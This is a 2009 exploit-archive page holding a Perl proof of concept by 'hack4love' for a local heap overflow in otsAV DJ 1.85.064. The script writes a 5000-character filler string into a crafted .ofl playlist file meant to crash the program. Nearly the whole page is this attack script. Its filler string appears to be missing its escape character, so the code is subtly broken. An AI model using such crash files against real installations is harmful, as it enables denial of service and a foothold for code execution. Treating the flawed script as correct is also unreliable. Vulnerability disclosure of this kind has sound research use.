[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
# Published : 2009-07-09
# Author : hack4love
# Previous Title : Soulseek 157 NS < 13e/156.* Remote Peer Search Code Execution PoC
# Next Title : MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)
#!/usr/bin/perl
# Found By :: HACK4LOVE
# all i want say welcom back 3asfh
# otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
# http://x.download.otszone.com/static/otsavdjtrialsetup.exe
########################################################################################
my $crash="x41" x 5000;
open(myfile,'>>hack4love.OFL');
print myfile $crash;
########################################################################################
# www.Syue.com [2009-07-09]